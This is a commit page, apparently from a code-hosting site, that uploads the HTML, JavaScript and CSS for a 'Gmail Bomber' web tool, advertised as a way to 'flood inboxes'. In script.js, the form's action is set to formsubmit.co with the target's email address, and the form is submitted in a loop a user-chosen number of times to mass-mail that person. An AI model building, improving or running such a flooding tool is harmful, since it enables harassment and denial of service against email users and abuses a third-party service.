zenjoul80 commited on
Commit
18fd292
·
verified ·
1 Parent(s): 4cbf3ce

Upload 3 files

Browse files
Files changed (3) hide show
  1. index.html +55 -0
  2. script.js +36 -0
  3. style.css +121 -0
index.html ADDED
@@ -0,0 +1,55 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Gmail Bomber</title>
7
+ <link rel="stylesheet" href="style.css">
8
+ <link href="https://cdn.jsdelivr.net/npm/remixicon@4.5.0/fonts/remixicon.css" rel="stylesheet" />
9
+ </head>
10
+ <body>
11
+ <!-- Window 1 -->
12
+ <div class="window1">
13
+ <div class="header-w1">
14
+ <span>HAWA</span>
15
+ <button onclick="w1_close()">
16
+ <i class="ri-close-line"></i>
17
+ </button>
18
+ </div>
19
+ <div class="content-w1">
20
+ <p>Email Bomber tool by <mark>HAWA</mark>:
21
+ Send mass emails instantly to flood inboxes.
22
+ Use responsibly.</p>
23
+ <button onclick="w2_open()">Start</button>
24
+ </div>
25
+ </div>
26
+
27
+ <!-- Window 1 -->
28
+ <div class="window2">
29
+ <div class="header-w2">
30
+ <span>Gmail Bomber</span>
31
+ <div class="actions">
32
+ <button class="minimize" onclick="w2_minimize()">—</button>
33
+ <button class="close" onclick="w2_close()">
34
+ <i class="ri-close-line"></i>
35
+ </button>
36
+ </div>
37
+ </div>
38
+ <div class="content-w2">
39
+ <input type="email" id="gmail" placeholder="Email Address" required="">
40
+ <input type="number" id="counter" value="10" required="">
41
+ <form method="POST">
42
+ <input type="hidden" name="_captcha" value="false">
43
+ <input type="text" name="_subject" placeholder="Subject" required="">
44
+ <input type="text" name="message" placeholder="Type Message..." required="">
45
+ <input type="hidden" name="_template" value="basic">
46
+ </form>
47
+ <button id="send">Start Bombing</button>
48
+ <span id="logger">...</span>
49
+ </div>
50
+ </div>
51
+
52
+ <!-- JAVASCRIPT -->
53
+ <script src="script.js"></script>
54
+ </body>
55
+ </html>
script.js ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ // JAVASCRIPT CODE
2
+
3
+ function w1_close(){
4
+ document.querySelector(".window1").style.display = "none";
5
+ }
6
+ function w2_open(){
7
+ document.querySelector(".window2").requestFullscreen();
8
+ document.querySelector(".window2").style.display = "block";
9
+ }
10
+ function w2_minimize(){
11
+ document.webkitExitFullscreen();
12
+ document.querySelector(".window2").style.display = "none";
13
+ }
14
+ function w2_close(){
15
+ window.location.reload();
16
+ }
17
+
18
+ // let count = document.querySelector("#counter").value;
19
+ let send = document.querySelector("#send");
20
+ let form = document.querySelector("form");
21
+
22
+ send.addEventListener("click", (event)=>{
23
+ event.preventDefault();
24
+ let gmail = document.querySelector("#gmail").value;
25
+ form.action = `https://formsubmit.co/${gmail}`;
26
+ let count = document.querySelector("#counter").value;
27
+ for (var a = 0; a < count; a++){
28
+ form.requestSubmit();
29
+ }
30
+ })
31
+
32
+ form.addEventListener("submit", (event)=>{
33
+ event.preventDefault();
34
+ let formData = new FormData(form);
35
+ console.log(formData.get("_subject"))
36
+ })
style.css ADDED
@@ -0,0 +1,121 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ * {
2
+ margin: 0;
3
+ padding: 0;
4
+ font-family: Sans-Serif;
5
+ box-sizing: border-box;
6
+ }
7
+ html, body {
8
+ height: 100%;
9
+ width: 100%;
10
+ }
11
+ body {
12
+ justify-content: center;
13
+ align-items: center;
14
+ display: flex;
15
+ background-color: grey;
16
+ }
17
+ .window1 {
18
+ background: #fff;
19
+ width: 60%;
20
+ height: auto;
21
+ resize: both;
22
+ overflow: auto;
23
+ /*display: none; */
24
+ }
25
+ .window1 .header-w1 {
26
+ background: #000;
27
+ justify-content: space-between;
28
+ align-items: center;
29
+ display: flex;
30
+ padding: 5px;
31
+ width: 100%;
32
+ }
33
+ .header-w1 span {
34
+ color: #fff;
35
+ }
36
+ .header-w1 button {
37
+ background: red;
38
+ color: #000;
39
+ }
40
+ .window1 .content-w1 {
41
+ padding: 10px;
42
+ }
43
+ .content-w1 p {
44
+ color: #444;
45
+ }
46
+ .content-w1 button {
47
+ padding: 2px 5px;
48
+ background: #00FF5B;
49
+ color: #000;
50
+ border-radius: 1.5px;
51
+ margin-top: 5px;
52
+ }
53
+
54
+ /* WINDOW 2 */
55
+
56
+ .window2 {
57
+ background: #fff;
58
+ width: 100%;
59
+ height: 100%;
60
+ overflow: auto;
61
+ display: none;
62
+ }
63
+ .window2 .header-w2 {
64
+ background: #000;
65
+ justify-content: space-between;
66
+ align-items: center;
67
+ display: flex;
68
+ padding: 5px;
69
+ width: 100%;
70
+ }
71
+ .header-w2 span {
72
+ color: #fff;
73
+ }
74
+ .header-w2 .actions {
75
+ justify-content: space-between;
76
+ align-items: center;
77
+ display: flex;
78
+ gap: 5px;
79
+ }
80
+ .actions button {
81
+ padding: 2px;
82
+ width: 30px;
83
+ }
84
+ .actions .minimize {
85
+ background: #00FF1C;
86
+ }
87
+ .actions .close {
88
+ background: red;
89
+ }
90
+ .window2 .content-w2 {
91
+ margin-top: 5px;
92
+ padding: 10px;
93
+ justify-content: center;
94
+ align-items: center;
95
+ display: flex;
96
+ flex-direction: column;
97
+ gap: 8px;
98
+ }
99
+ .content-w2 input {
100
+ text-indent: 5px;
101
+ border: 0.5px solid grey;
102
+ box-shadow: 1px 1px 2px grey;
103
+ height: 25px;
104
+ width: 225px;
105
+ border-radius: 2.5px;
106
+ }
107
+ .content-w2 form {
108
+ justify-content: center;
109
+ align-items: center;
110
+ display: flex;
111
+ flex-direction: column;
112
+ gap: 8px;
113
+ }
114
+ .content-w2 button {
115
+ background: red;
116
+ color: #fff;
117
+ padding: 2.5px;
118
+ height: 25;
119
+ width: 225px;
120
+ border-radius: 2.5px;
121
+ }